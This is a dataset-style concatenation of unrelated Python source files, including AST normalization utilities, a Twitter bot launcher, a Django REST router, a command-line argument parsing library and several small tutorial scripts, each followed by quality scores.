return f"df{ctr}"
if len({i.value for i in series_repl_map.keys()}) <= 1:
def series_arg_creator(ctr: int):
return "series"
else:
def series_arg_creator(ctr: int):
return f"series{ctr}"
for node in df_repl_map.keys():
df_repl_map[node] = astlib.create_name_expr(df_arg_creator(seen_dfs[node.value]))
for node in series_repl_map.keys():
series_repl_map[node] = astlib.create_name_expr(series_arg_creator(seen_series[node.value]))
output_map: NodeReplMap = {}
target = astlib.with_deep_replacements(target, {**df_repl_map, **series_repl_map}, output_map)
return (target,
sorted(i.value for i in df_repl_map.values()),
sorted(i.value for i in series_repl_map.values()),
output_map)
def normalize_call_args(
target: astlib.AstNode, inferred_types: Dict[astlib.BaseExpression, SerializedMypyType]
) -> Tuple[NewTarget, NodeReplMap]:
"""Normalize order of keyword arguments"""
repl_map: NodeReplMap = {}
for node in astlib.walk(target):
if not isinstance(node, astlib.Call):
continue
call_expr = node
if (call_expr.func not in inferred_types) or (not inferred_types[call_expr.func].is_callable_type()):
continue
if any(arg.star != "" for arg in call_expr.args):
# TODO: How to handle starred args?
continue
pos_args = [arg for arg in call_expr.args if arg.keyword is None]
kw_args = [arg for arg in call_expr.args if arg.keyword is not None]
arg_order = inferred_types[call_expr.func].get_callable_arg_order()
new_args = [*pos_args] + sorted(kw_args, key=lambda x: arg_order.get(x.keyword.value, 0))
if len(new_args) > 0:
new_args[-1] = new_args[-1].with_changes(comma=astlib.cst.MaybeSentinel.DEFAULT)
if new_args != call_expr.args:
repl_map[call_expr] = call_expr.with_changes(args=new_args)
output_mapping: NodeReplMap = {}
if len(repl_map) != 0:
target = astlib.with_deep_replacements(target, repl_map, output_mapping)
return target, output_mapping
def normalize_col_accesses(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType]
) -> Tuple[NewTarget, NodeReplMap]:
"""Normalizes col accesses by converting attribute-based accesses like df.Price to
subscript-based such as df['Price']"""
repl_map: NodeReplMap = {}
for expr in true_exprs:
if expr not in inferred_types:
continue
expr_typ = inferred_types[expr]
if isinstance(expr, astlib.Attribute):
value = expr.value
if value not in inferred_types:
continue
val_typ = inferred_types[value]
okay = False
# print("GOT HERE", val_typ, expr_typ)
if val_typ.equals(DF_TYPE) and (expr_typ.equals(DF_TYPE) or expr_typ.equals(SERIES_TYPE)):
try:
if (not hasattr(pd.DataFrame, expr.attr.value)) and (not hasattr(pd.Series, expr.attr.value)):
okay = True
except:
pass
elif (val_typ.equals(DF_GROUPBY_TYPE) and
(expr_typ.equals(DF_GROUPBY_TYPE) or expr_typ.equals(SERIES_GROUPBY_TYPE))):
try:
if not hasattr(pd.core.groupby.generic.DataFrameGroupBy, expr.attr.value):
okay = True
except:
pass
if okay:
new_node = astlib.parse_expr(f"dummy[\"{expr.attr.value}\"]").with_changes(value=expr.value)
repl_map[expr] = new_node
output_mapping: NodeReplMap = {}
if len(repl_map) != 0:
target = astlib.with_deep_replacements(target, repl_map, output_mapping)
return target, output_mapping
def templatize(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
lib_usages: Dict[astlib.Name, str],
) -> Tuple[NewTarget, Dict[str, List[str]]]:
"""Replace constants and remaining variable names with standard ones to create a template suitable for clustering"""
type_to_exprs: Dict[str, List[astlib.BaseExpression]] = collections.defaultdict(list)
allowed_key_chars = set(string.ascii_letters + string.digits + "_")
for node in true_exprs:
is_const = astlib.is_constant(node)
const_val = None if not is_const else astlib.get_constant_value(node)
if not ((isinstance(node, astlib.Name) and node in free_vars) or
(is_const and not isinstance(const_val, (set, dict, list, tuple)))):
continue
if node in lib_usages:
continue
if node not in inferred_types:
if not is_const:
continue
key = type(const_val).__name__
else:
typ = inferred_types[node]
if typ.equals(DF_TYPE):
key = "df"
elif typ.equals(SERIES_TYPE):
key = "series"
elif typ.is_callable_type():
continue
elif typ.is_str_type():
key = "str"
elif typ.is_int_type():
key = "int"
elif typ.is_bool_type():
if isinstance(node, astlib.Name) and node.value in {"True", "False"}:
continue
key = "bool"
elif typ.is_float_type():
key = "float"
else:
while typ.is_union_type():
typ = typ.unpack_union_type()[0]
if isinstance(typ.type_json, str):
key = typ.type_json
else:
key = str(typ.type_json.get('.class', "VAR"))
key = "".join(i if i in allowed_key_chars else '_' for i in key)
type_to_exprs[key].append(node)
# print("Adding", key, astlib.to_code(node))
ctr_map: Dict[str, Dict[str, int]] = {k: {} for k in type_to_exprs.keys()}
repl_map: NodeReplMap = {}
names_map: Dict[str, List[str]] = collections.defaultdict(list)
for typ_key, exprs in type_to_exprs.items():
ctr_map_entry = ctr_map[typ_key]
for expr in exprs:
node_key = astlib.to_code(expr)
if node_key not in ctr_map_entry:
ctr_map_entry[node_key] = idx = len(ctr_map_entry) + 1
names_map[typ_key].append(f"{typ_key.upper()}{idx}")
idx = ctr_map_entry[node_key]
repl_map[expr] = astlib.create_name_expr(f"{typ_key.upper()}{idx}")
return astlib.with_deep_replacements(target, repl_map), names_map
def get_mypy_cache_dir_path(uid: int) -> str:
"""Returns a cache dir to use for mypy based on a UID. Useful for multiprocess safety."""
script_dir = os.path.abspath(os.path.dirname(__file__))
return os.path.join(script_dir, f".mypy_cache{uid}")
def get_created_mypy_cache_dir_paths() -> List[str]:
"""Returns all the created mypy cache dirs"""
script_dir = os.path.abspath(os.path.dirname(__file__))
return glob.glob(os.path.join(script_dir, ".mypy_cache*"))
| 2.1875 | 2 |
015_011_19.py | priyankakushi/machine-learning | 0 | 12796816 | <gh_stars>0
# File Input Output
# Write in a file
'''file = open("abc.txt", "w+")
file.write("python is great language. \nYeah its great! !\n")
file. write ("How are you. \nYeah its great! ! \n")
file. write ("Hello Priyanka!\n")
file.close()
# Read through file
file = open("abc.txt", "r+")
#print(file.read())
#print(file.readlines())
print(file.readline())
print(file.readable())
file.close()
# Use of Append in File
# Difference between write and append
file = open("abc.txt", "a+")
file.write("How are you!\n")
file.write("What are you doing today!\n")
print(file.tell())
file.close()'''
file = open("abc.txt", "w+")
file.write("hello Soni!\n")
file.write("how are you!\n")
file.close()
#read through file
file = open("abc.txt", "r+")
#print(file.read())
#print(file.readline())
#print(file.readlines())
print(file.readable())
print(file.read(3))
file.close()
#use of append in file
file = open("abc.txt", "a+")
file.write("what are you doing!\n")
print(file.tell())
file.close()
| 4.1875 | 4 |
pythia-gen/flow/models/ptconv.py | okitouni/HEP-Geometric | 0 | 12796817 | <reponame>okitouni/HEP-Geometric
from torch_geometric.nn import MessagePassing
from typing import Optional, Callable, Union
from torch import Tensor
from torch_geometric.typing import PairTensor, Adj
class PtConv(MessagePassing):
def __init__(self, nn: Callable, aggr: str = 'max', **kwargs):
super(PtConv, self).__init__(aggr=aggr, **kwargs)
self.nn = nn
def forward(self, x: Union[Tensor, PairTensor], edge_index: Adj) -> Tensor:
""""""
if isinstance(x, Tensor):
x: PairTensor = (x, x)
# propagate_type: (x: PairTensor)
return self.propagate(edge_index, x=x, size=None,test=None)
# test here is place holder for anything that could used in the
# message passing step
def message(self, x_i: Tensor, x_j: Tensor, test) -> Tensor:
return self.nn(x_i)
def __repr__(self):
return '{}(nn={})'.format(self.__class__.__name__, self.nn)
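# A minimal usage sketch (illustrative only; shapes and the MLP are placeholders):
#
#   mlp = torch.nn.Sequential(torch.nn.Linear(16, 32), torch.nn.ReLU())
#   conv = PtConv(mlp, aggr='max')
#   out = conv(x, edge_index)   # x: [num_nodes, 16], edge_index: [2, num_edges]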
| 2.40625 | 2 |
Sprint_4/Practice/F/anagram_group.py | DimaZzZz101/Yandex_Practicum_Algorithms | 0 | 12796818 | <filename>Sprint_4/Practice/F/anagram_group.py
def main():
n = int(input())
anagrams = input().strip().split()[:n]
hashes = {}
indexes = {}
for index, anagram in enumerate(anagrams):
key = ''.join(sorted(anagram))
if hashes.get(key) is None:
hashes[key] = index
indexes[index] = [index]
else:
indexes[hashes[key]].append(index)
for index in indexes.keys():
print(' '.join(map(str, indexes[index])))
if __name__ == '__main__':
main()
| 3.90625 | 4 |
bot/bot.py | Tw1ddle/geometrize-twitter-bot | 13 | 12796819 | ## @package bot
# Module that sets up the Geometrize Twitter bot.
#
# Invoke this script to run the bot i.e. "python bot.py".
import sys
import config
import dependency_locator
import geometrize
import geometrize_bot
import launch_text
import on_status_event
import tweepy
# Print welcome text.
launch_text.print_launch_text()
# Check that secrets/app credentials have been filled out.
if not config.validate_credentials():
print("Failed to validate app credentials, will exit. Did you remember to enter them in config.py?")
sys.exit(1)
# Check that the Geometrize executable is where we expect it to be.
if not dependency_locator.geometrize_executable_exists():
print("Failed to locate the Geometrize executable, will exit. Did you copy it to the 'geometrize' subdirectory? Expected it to be here: " + dependency_locator.get_geometrize_executable_path())
sys.exit(2)
# Run a quick test script to confirm Geometrize is in working order.
print("Running startup tests to ensure Geometrize is working...\r\n")
if geometrize.test_geometrize():
print("Geometrize startup tests succeeded!\r\n")
else:
print("Geometrize startup tests failed. Please report an issue here: https://github.com/Tw1ddle/geometrize-twitter-bot \r\n")
sys.exit(3)
# Connect to Twitter.
tweepy_auth = tweepy.OAuthHandler(config.OAUTH_CONSUMER_KEY, config.OAUTH_CONSUMER_SECRET)
tweepy_auth.set_access_token(config.OAUTH_ACCESS_TOKEN, config.OAUTH_ACCESS_SECRET)
tweepy_api = tweepy.API(tweepy_auth)
## Callback triggered when the stream listener connects.
def on_connect(api):
print("Twitter stream listener did connect")
## Callback triggered when the stream listener times out.
def on_timeout(api):
print("Twitter stream listener did time out")
return False
## Callback triggered when the listener encounters an error.
def on_error(api, code):
print("Encountered Twitter error response: %s" % code)
return True
## Callback triggered when the stream listener for the Geometrize bot account reports a status event.
def on_on_demand_status_event(api, status):
print("Received Twitter stream listener status event")
on_status_event.on_on_demand_status_event(api, status)
## Callback triggered when the stream listener for tracking specific Twitter accounts reports a status event.
def on_account_watcher_status_event(api, status):
print("Received Twitter stream listener status event")
on_status_event.on_account_watcher_status_event(api, status)
## Callback triggered when setting up the stream filter for tracking the Geometrize bot account.
def on_on_demand_filter_setup(stream):
print("Setting up on demand tweet filter...")
stream.filter(track = [config.TWITTER_BOT_USERNAME], is_async = True)
## Callback triggered when setting up the stream filter for tracking specific Twitter accounts.
def on_account_watcher_filter_setup(stream):
print("Setting up account watcher tweet filter...")
stream.filter(follow = config.TWITTER_BOT_WATCH_ACCOUNTS, is_async = True)
# Create and set up the on-demand Geometrize bot.
# This bot waits for users to tweet images at the bot, which it then geometrizes.
on_demand_bot = geometrize_bot.GeometrizeBot(
tweepy_auth,
tweepy_api,
on_connect,
on_timeout,
on_error,
on_on_demand_status_event,
on_on_demand_filter_setup)
# Create and set up the specific account watcher bot.
# This bot watches specific accounts and geometrizes images they tweet.
account_watcher_bot = geometrize_bot.GeometrizeBot(
tweepy_auth,
tweepy_api,
on_connect,
on_timeout,
on_error,
on_account_watcher_status_event,
on_account_watcher_filter_setup)
| 2.734375 | 3 |
src/nn/repeat.py | renmengye/imageqa-public | 100 | 12796820 | <gh_stars>10-100
class Repeat(Stage):
pass | 0.710938 | 1 |
application/urls.py | openspending/cosmopolitan | 4 | 12796821 | <reponame>openspending/cosmopolitan
from django.conf.urls import include
from django.conf.urls import url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from rest_framework import routers
from cosmopolitan.viewsets import ContinentViewSet
from cosmopolitan.viewsets import CountryViewSet
from cosmopolitan.viewsets import RegionViewSet
from cosmopolitan.viewsets import CityViewSet
from cosmopolitan.viewsets import CurrencyViewSet
from cosmopolitan.viewsets import PostcodeViewSet
from cosmopolitan.viewsets import CountryPolygonViewSet
from cosmopolitan.viewsets import CityPolygonViewSet
from cosmopolitan.viewsets import RegionPolygonViewSet
from cosmopolitan.viewsets import PolygonViewSet
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'continents', ContinentViewSet)
router.register(r'countries', CountryViewSet, base_name='country')
router.register(r'regions', RegionViewSet, base_name='region')
router.register(r'cities', CityViewSet, base_name='city')
router.register(r'currencies', CurrencyViewSet, base_name='currency')
router.register(r'postcodes', PostcodeViewSet, base_name='postcode')
router.register(r'countrypolygons', CountryPolygonViewSet,
base_name='countrypolygon')
router.register(r'citypolygons', CityPolygonViewSet, base_name='citypolygon')
router.register(r'regionpolygons', RegionPolygonViewSet,
base_name='regionpolygon')
router.register(r'polygons', PolygonViewSet, base_name='polygon')
urlpatterns = [
url(r'^', include(router.urls)),
url(r'^v1/', include(router.urls)),
]
urlpatterns += staticfiles_urlpatterns()
| 2.046875 | 2 |
share/oaipmh/views.py | felliott/SHARE | 0 | 12796822 | from django.views.generic.base import View
from django.http import HttpResponse
from share.oaipmh.repository import OAIRepository
class OAIPMHView(View):
CONTENT_TYPE = 'text/xml'
def get(self, request):
return self.oai_response(**request.GET)
def post(self, request):
return self.oai_response(**request.POST)
def oai_response(self, **kwargs):
repository = OAIRepository()
xml = repository.handle_request(self.request, kwargs)
return HttpResponse(xml, content_type=self.CONTENT_TYPE)
| 1.921875 | 2 |
klarg.py | tominekan/klarg | 0 | 12796823 | import sys
from typing import Callable, Union
# Some information about this package
__version__ = "1.1.0"
# All the command line arguments
ALL_ARGS = sys.argv[1: len(sys.argv)]
# The configuration settings, this can be changed with the config function
CONFIG = {
"needs_short_flags": False,
"long_prefix": "--",
"short_prefix": "-",
"help_flag": ("--help", "-h"),
"version_flag": ("--version", "-v")
}
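# Illustrative example: callers can tweak parsing behaviour by mutating CONFIG
# before reading any arguments, e.g.
#   CONFIG["needs_short_flags"] = True
#   CONFIG["version_flag"] = ("--version", "-V")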
"""
Here is a list of all the base functions
"""
def base_exists(name: str, args_list: list) -> bool:
return name in args_list
def base_get_all(args_list: list) -> list: # bigoof
return args_list
def base_get_bool(
name: str,
args_list: list,
short: str = "default-str"
) -> bool:
long_name = CONFIG["long_prefix"] + name
short_name = CONFIG["short_prefix"] + short
if short == "default-short":
if (CONFIG["needs_short_flags"]):
raise Exception(
"No short flag for get_bool()"
)
else:
if base_exists(long_name, args_list):
return True
else:
return False
else:
if base_exists(long_name, args_list):
return True
if base_exists(short_name, args_list):
return True
else:
return False
def base_on_help(action: Callable, args_list: list) -> None:
"""
`action: function: NEEDED`
The `action` is run when klarg detects the help flag.
What klarg looks for can be configured in `CONFIG`
with the option `"help_flag"`.
Example:
```py
# docs_example.py
import klarg
def display_help_message():
print("Here you go")
klarg.on_help(display_help_message)
# python docs_example.py --help
# Here you go
```
"""
long_help, short_help = CONFIG["help_flag"]
if base_exists(long_help, args_list):
action()
if base_exists(short_help, args_list):
action()
def base_on_version(message: str, args_list: list) -> None:
"""
`message: str: NEEDED`
Klarg displays the `message` when the version flag is detected.
What klarg looks for can be configured in `CONFIG`
with the option `"version_flag"`.
Example:
```py
# docs_example.py
import klarg
klarg.project_version("This project version is 1.2.3")
# python docs_example.py --version
# This project version is 1.2.3
```
"""
long_version, short_version = CONFIG["version_flag"]
if base_exists(long_version, args_list):
print(message)
if base_exists(short_version, args_list):
print(message)
def base_get_str(
name: str,
args_list: list,
short: str = "default-short",
on_error: dict = {}
) -> Union[str, None]:
"""
`name: str: NEEDED`
`short: str: optional`
`on_error: dict: optional`
`get_str` is a function that collects a `name`,
which is the multi letter flag, and a `short`, which is the
shortened version of the flag. There are two types of
errors it can encounter: no value is provided (`ERR_NONE`), or the
flag is given more than once (`ERR_MUL`). `on_error` is a dictionary
that may map either key to a handler; defaults are used otherwise.
Example:
```py
# docs_example.py
import klarg
def handle_error_none():
print(f"No values provided")
some_str = klarg.get_str("--some-str", "-s", on_error=handle_error_none)
print(f"{some_str} is cool")
# python docs_example.py --some-str
# No values provided
# python docs_example.py -s "klarg"
# klarg is cool
```
"""
long_name = CONFIG["long_prefix"] + name
short_name = CONFIG["short_prefix"] + short
# Checks if a given argument is a value or not.
def is_valid_value(arg: str) -> bool:
# Makes sure it is not a multi letter flag
if arg.startswith(CONFIG["long_prefix"]):
return False
# Makes sure it is not a short flag
if arg.startswith(CONFIG["short_prefix"]):
return False
# Makes sure it is not part of the version or help flags
if (arg in CONFIG["version_flag"]) or (arg in CONFIG["help_flag"]):
return False
else:
return True
# Default handling for ERR_NONE
def default_handle_none():
print(f"ERR_NONE: There is no value provided for {long_name}")
exit(1)
# Default handling for ERR_MUL
def default_handle_mul():
print(f"ERR_MUL: There are multiple values provided for {long_name}")
exit(1)
def is_key(key, dict: dict) -> bool:
if key in dict.keys():
return True
else:
return False
non_existent_long_name = not base_exists(long_name, args_list)
non_existent_short_name = not base_exists(short_name, args_list)
# Does not exist in command line args
if non_existent_long_name and non_existent_short_name:
return None
# Configure error_handling
if not is_key("ERR_NONE", on_error):
on_error["ERR_NONE"] = default_handle_none
if not is_key("ERR_MUL", on_error):
on_error["ERR_MUL"] = default_handle_mul
# ERR_NONE
# There cannot be enough space for both the argument and
# its value
if len(args_list) < 2:
on_error["ERR_NONE"]()
# ERR_MUL
# If there is more than one occurence of short_name or long_name
if (args_list.count(long_name) > 1) or (args_list.count(short_name) > 1):
on_error["ERR_MUL"]()
# ERR_MUL
# if both short and long arguments exists
long_args_exists = base_exists(long_name, args_list)
short_args_exists = base_exists(short_name, args_list)
if long_args_exists and short_args_exists:
on_error["ERR_MUL"]()
# Gets the next value of the given flag
def get_next_value(flag: str) -> str:
index_point = args_list.index(flag)
next_value = args_list[(index_point + 1)]
if (is_valid_value(next_value)):
return next_value
else: # ERR_NONE
# If there is no argument passed to
# long_args
on_error["ERR_NONE"]()
if short == "default-short":
if (CONFIG["needs_short_flags"]):
raise Exception(
f"No short flag for {long_name}"
)
else:
return get_next_value(long_name)
else:
if base_exists(long_name, args_list):
return get_next_value(long_name)
elif base_exists(short_name, args_list):
return get_next_value(short_name)
else: # If it does not exist
return None
def base_get_num(
name: str,
args_list: dict,
short: str = "default-short",
on_error: dict = {},
) -> Union[int, float, None]:
def is_key(key, dict: dict) -> bool:
if key in dict.keys():
return True
else:
return False
def to_num(string: str) -> Union[int, float, str]:
if "." in string:
return float(string)
else:
try:
return int(string)
except ValueError:
return string
# Default handling for ERR_NUM
def default_handle_num(value):
print(f"ERR_NUM: \"{value}\" is not a number")
exit(1)
if not is_key("ERR_NUM", on_error):
on_error["ERR_NUM"] = default_handle_num
value = base_get_str(
name=name,
short=short,
on_error=on_error,
args_list=args_list
)
num = to_num(value)
if type(num) == str:
on_error["ERR_NUM"](value)
else:
return num
"""
-------------------------------------------- KLARG BASIC
"""
def exists(name: str) -> bool:
"""
`name: str: NEEDED`
Checks if the `name` exists in the list of command line arguments given,
this was designed to be an internal function for making things more
readable, but then I realized that it could potentially be helpful.
Example:
```py
# docs_example.py
import klarg
something_exists = klarg.exists("something")
if something_exists:
print("Something exists")
else:
print("Nothing exists (that's kind of dark)")
# python docs_example.py does something exist
# Something exists
# python docs_example.py does nothing exist
# Nothing exists (that's kind of dark)
```
"""
return base_exists(name=name, args_list=ALL_ARGS)
def get_all() -> list:
"""
Collects all the arguments passed and returns them all as a tuple
full of strings. This is useful when a program needs to collect
a list of all the arguments passed on to operate on,
it passes everything single option passed to the file
Example:
` ```py
# docs_example.py
import klarg
all_args = klarg.get_all()
print(f"All args {all_args}")
# python docs_example.py -a -b "c" -d --efgh --ijklmn 0
# All args ("-a", "-b", "c", "-d", "--efgh", "--ijklmn", "0")
```
"""
return ALL_ARGS
def get_bool(name: str, short: str = "default-short") -> bool:
"""
`name: str: NEEDED`
`short: str: optional`
`get_bool` is a function that collects `name`, a string, and `short`,
also a string. `name` is the long name for the command line argument,
i.e. (`--long-name`). `short` is the shorter name for the command
line argument (`-s`). Normally, if `short` is not given,
then it will not raise an error, unless `"needs_short_flags"`
is set to `True` in `CONFIG`.
Example:
```py
# docs_example.py
import klarg
is_there = klarg.bool("--is-there", "-i")
if (is_there):
print("Is there")
else:
print("Is not there")
# python docs_example.py
# Is not there
# python docs_example.py --is-there
# is there
```
"""
return base_get_bool(
name=name,
short=short,
args_list=ALL_ARGS
)
def on_help(action: Callable) -> None:
"""
`action: function: NEEDED`
The `action` is run when klarg detects the help flag.
What klarg looks for can be configured in `CONFIG`
with the option `"help_flag"`.
Example:
```py
# docs_example.py
import klarg
def display_help_message():
print("Here you go")
klarg.on_help(display_help_message)
# python docs_example.py --help
# Here you go
```
"""
return base_on_help(
action=action,
args_list=ALL_ARGS
)
def on_version(message: str) -> None:
"""
`message: str: NEEDED`
Klarg displays the `message` when the version flag is detected.
What klarg looks for can be configured in `CONFIG`
with the option `"version_flag"`.
Example:
```py
# docs_example.py
import klarg
klarg.project_version("This project version is 1.2.3")
# python docs_example.py --version
# This project version is 1.2.3
```
"""
return base_on_version(
message=message,
args_list=ALL_ARGS
)
def get_str(
name: str,
short: str = "default-short",
on_error: dict = {}
) -> Union[str, None]:
"""
`name: str: NEEDED`
`short: str: optional`
`on_error: dict: optional`
`get_str` is a function that collects a `name`,
which is the multi letter flag, and a `short`, which is the
shortened version of the flag. There are two types of
errors it can encounter: no value is provided (`ERR_NONE`), or the
flag is given more than once (`ERR_MUL`). `on_error` is a dictionary
that may map either key to a handler; defaults are used otherwise.
Example:
```py
# docs_example.py
import klarg
def handle_error_none():
print(f"No values provided")
some_str = klarg.get_str("--some-str", "-s", on_error=handle_error_none)
print(f"{some_str} is cool")
# python docs_example.py --some-str
# No values provided
# python docs_example.py -s "klarg"
# klarg is cool
```
"""
return base_get_str(
name=name,
short=short,
on_error=on_error,
args_list=ALL_ARGS
)
def get_num(
name: str,
short: str = "default-short",
on_error: dict = {}
) -> Union[int, float, None]:
"""
`name: str: NEEDED`
`short: str: optional`
`on_error: dict: optional`
`get_num` is a function that collects a `name`,
which is the multi letter flag, a `short`,
which is the shortened version of the flag.
There are three possible types of errors it can encounter:
the value it got was not a number, it did not
get a value at all, or there are multiple declarations of that flag.
The error names are `ERR_NUM`, `ERR_NONE` and `ERR_MUL` respectively.
`on_error` is a dictionary, all three keys,
`ERR_NUM`,`ERR_NONE` and `ERR_MUL` are not all needed,
because there is default handling for those types of errors.
However, if there is no flag with the name of `name`,
then `get_num` returns None.
Example:
```py
# docs_example.py
import klarg
def handle_error_num(value):
print(f"{value} is not a number")
def handle_error_none():
print("No values provided")
error_handlers = {
"ERR_NUM": handle_error_num(),
"ERR_NONE": handle_error_none()
}
number_something = klarg.get_num(
name="--number-something",
short="-n", on_error=error_handlers
)
print(f"The suprise number is {number_something}")
# python docs_example.py -n 1a
# 1a is not a number
# python docs_example.py -n
# No values provided
# python docs_example.py -n 12345
# The suprise number is 12345
```
"""
return base_get_num(
name=name,
short=short,
on_error=on_error,
args_list=ALL_ARGS
)
class command():
"""
`name: str: NEEDED`
This creates a class with the command line that has the functions
`project_version()`, `on_help()`, `get_num()`, `get_str()`,
`get_bool()`, and `get_all()`. The only difference is that
the arguments are parsed after the declaration of the command.
This means that if you have a list of command line arguments
`["-f", "reply", "-n", "12", "example.txt"]`,
and the command name is `reply`. The available command line arguments
are `["-n", "12", "example.txt"]`
"""
def __init__(self, name: str):
beginning_index = ALL_ARGS.index(name) + 1
self.all_arguments = ALL_ARGS[beginning_index: len(ALL_ARGS)]
def exists(self, name: str) -> bool:
"""
`name: str: NEEDED`
Checks if the `name` exists in the list of command line
arguments given, this was designed to be an
internal function for making things more readable, but then
I realized that it could potentially be helpful.
Example:
```py
# docs_example.py
import klarg
something_exists = klarg.exists("something")
if something_exists:
print("Something exists")
else:
print("Nothing exists (that's kind of dark)")
# python docs_example.py does something exist
# Something exists
# python docs_example.py does nothing exist
# Nothing exists (that's kind of dark)
```
"""
return base_exists(name=name, args_list=self.all_arguments)
def get_all(self) -> list:
"""
Collects all the arguments passed and returns them all as a tuple
full of strings. This is useful when a program needs to collect
a list of all the arguments passed on to operate on,
it passes everything single option passed to the file
Example:
` ```py
# docs_example.py
import klarg
all_args = klarg.get_all()
print(f"All args {all_args}")
# python docs_example.py -a -b "c" -d --efgh --ijklmn 0
# All args ("-a", "-b", "c", "-d", "--efgh", "--ijklmn", "0")
```
"""
return base_get_all(self.all_arguments)
def get_bool(self, name: str, short: str = "default-short") -> bool:
"""
`name: str: NEEDED`
`short: str: optional`
`get_bool` is a function that collects `name`, a string, and `short`,
also a string. `name` is the long name for the command line argument,
i.e. (`--long-name`). `short` is the shorter name for the command
line argument (`-s`). Normally, if `short` is not given,
then it will not raise an error, unless `"needs_short_flags"`
is set to `True` in `CONFIG`.
Example:
```py
# docs_example.py
import klarg
is_there = klarg.bool("--is-there", "-i")
if (is_there):
print("Is there")
else:
print("Is not there")
# python docs_example.py
# Is not there
# python docs_example.py --is-there
# is there
```
"""
return base_get_bool(
name=name,
short=short,
args_list=self.all_arguments
)
def on_help(self, action: Callable) -> None:
"""
`action: function: NEEDED`
The `action` is run when klarg detects the help flag.
What klarg looks for can be configured in `CONFIG`
with the option `"help_flag"`.
Example:
```py
# docs_example.py
import klarg
def display_help_message():
print("Here you go")
klarg.on_help(display_help_message)
# python docs_example.py --help
# Here you go
```
"""
return base_on_help(
action=action,
args_list=self.all_arguments
)
def on_version(self, message: str) -> None:
"""
`message: str: NEEDED`
Klarg displays the `message` when the version flag is detected.
What klarg looks for can be configured in `CONFIG`
with the option `"version_flag"`.
Example:
```py
# docs_example.py
import klarg
klarg.project_version("This project version is 1.2.3")
# python docs_example.py --version
# This project version is 1.2.3
```
"""
return base_on_version(
message=message,
args_list=self.all_arguments
)
def get_str(
self,
name: str,
short: str = "default-short",
on_error: dict = {}
) -> Union[str, None]:
"""
`name: str: NEEDED`
`short: str: optional`
`on_error: dict: optional`
`get_str` is a function that collects a `name`,
which is the multi letter flag, and a `short`, which is the
shortened version of the flag. There are two types of
errors it can encounter: no value is provided (`ERR_NONE`), or the
flag is given more than once (`ERR_MUL`). `on_error` is a dictionary
that may map either key to a handler; defaults are used otherwise.
Example:
```py
# docs_example.py
import klarg
def handle_error_none():
print(f"No values provided")
some_str = klarg.get_str(
"--some-str",
"-s",
on_error={"ERR_NONE": handle_error_none}
)
print(f"{some_str} is cool")
# python docs_example.py --some-str
# No values provided
# python docs_example.py -s "klarg"
# klarg is cool
```
"""
return base_get_str(
name=name,
short=short,
on_error=on_error,
args_list=self.all_arguments
)
def get_num(
self,
name: str,
short: str = "default-short",
on_error: dict = {}
) -> Union[int, float, None]:
"""
`name: str: NEEDED`
`short: str: optional`
`on_error: dict: optional`
`get_num` is a function that collects a `name`,
which is the multi letter flag, a `short`,
which is the shortened version of the flag.
There are three possible types of errors it can encounter:
the value it got was not a number, it did not
get a value at all, or there are multiple declarations of that
flag. The error names are `ERR_NUM`, `ERR_NONE` and `ERR_MUL`
respectively. `on_error` is a dictionary, all three keys,
`ERR_NUM`,`ERR_NONE` and `ERR_MUL` are not all needed,
because there is default handling for those types of errors.
However, if there is no flag with the name of `name`,
then `get_num` returns None.
Example:
```py
# docs_example.py
import klarg
def handle_error_num(value):
print(f"{value} is not a number")
def handle_error_none():
print("No values provided")
error_handlers = {
"ERR_NUM": handle_error_num(),
"ERR_NONE": handle_error_none()
}
number_something = klarg.get_num(
name="--number-something",
short="-n", on_error=error_handlers
)
print(f"The suprise number is {number_something}")
# python docs_example.py -n 1a
# 1a is not a number
# python docs_example.py -n
# No values provided
# python docs_example.py -n 12345
# The suprise number is 12345
```
"""
return base_get_num(
name=name,
short=short,
on_error=on_error,
args_list=self.all_arguments
)
| 2.6875 | 3 |
src/Jupyter/Jupyter_frontend.py | Chaostheeory/Insight-DOTA-Mine | 0 | 12796824 | import pandas as pd
import psycopg2
#from sqlalchemy import create_engine
psql_credential = {
'database': 'wode',
'user': 'wode',
'password': '***',
'host': '192.168.3.11',
'port': '5432'
}
con = psycopg2.connect(**psql_credential)
def get_winrate(user_id):
query = "SELECT position, winrate FROM positions WHERE user_id='%s' order by position" % user_id
query_results = pd.read_sql_query(query,con)
return query_results
get_winrate(119807644)
| 2.953125 | 3 |
python_tuto_string_formatting.py | khinthandarkyaw98/Python_Practice | 0 | 12796825 | # python string formatting
# a placeholder where you want to display the price
price = 49
txt = 'The price is {} dollars'
print(txt.format(price))
# Display a number with two decimals
txt = 'The price is {:.2f} dollars.'
print(txt.format(price))
# multiple values
quantity = 3
itemno = 567
price = 49
myorder = 'I want {} pieces of item number {} for {:.2f} dollars.'
print(myorder.format(quantity, itemno, price))
# index number
myorder = 'I want {0} pieces of item number {1} for {2:.2f} dollars.'
print(myorder.format(quantity, itemno, price))
# if you want to refer to the same value more than once, use the index number.
age = 36
name = 'John'
txt = 'His name is {1}. {1} is {0} years old.'
print(txt.format(age, name))
# named indexes
myorder = 'I have a {carname}, it is a {model}.'
print(myorder.format(carname = 'Ford', model = 'Mustang')) | 4.125 | 4 |
digits/inference/__init__.py | ojmakhura/DIGITS | 0 | 12796826 | # Copyright (c) 2016-2017, NVIDIA CORPORATION. All rights reserved.
from .images import ImageInferenceJob
from .job import InferenceJob
__all__ = [
'InferenceJob',
'ImageInferenceJob',
]
| 1.054688 | 1 |
src/emmental/schedulers/scheduler.py | KeAWang/emmental | 0 | 12796827 | """Emmental scheduler."""
from abc import ABC, abstractmethod
from typing import Any, Iterator, List
from emmental.data import EmmentalDataLoader
from emmental.model import EmmentalModel
class Scheduler(ABC):
"""Generate batch generator from dataloaders in designed order."""
def __init__(self) -> None:
"""Initialize Scheduler."""
pass
def get_num_batches(self, dataloaders: List[EmmentalDataLoader]) -> int:
"""Get total number of batches per epoch.
Args:
dataloaders: List of dataloaders.
Returns:
Total number of batches per epoch.
"""
raise NotImplementedError()
@abstractmethod
def get_batches(
self, dataloaders: List[EmmentalDataLoader], model: EmmentalModel = None
) -> Iterator[Any]:
"""Generate batch generator from all dataloaders for one epoch.
Args:
dataloaders: List of dataloaders.
model: The training model, defaults to None.
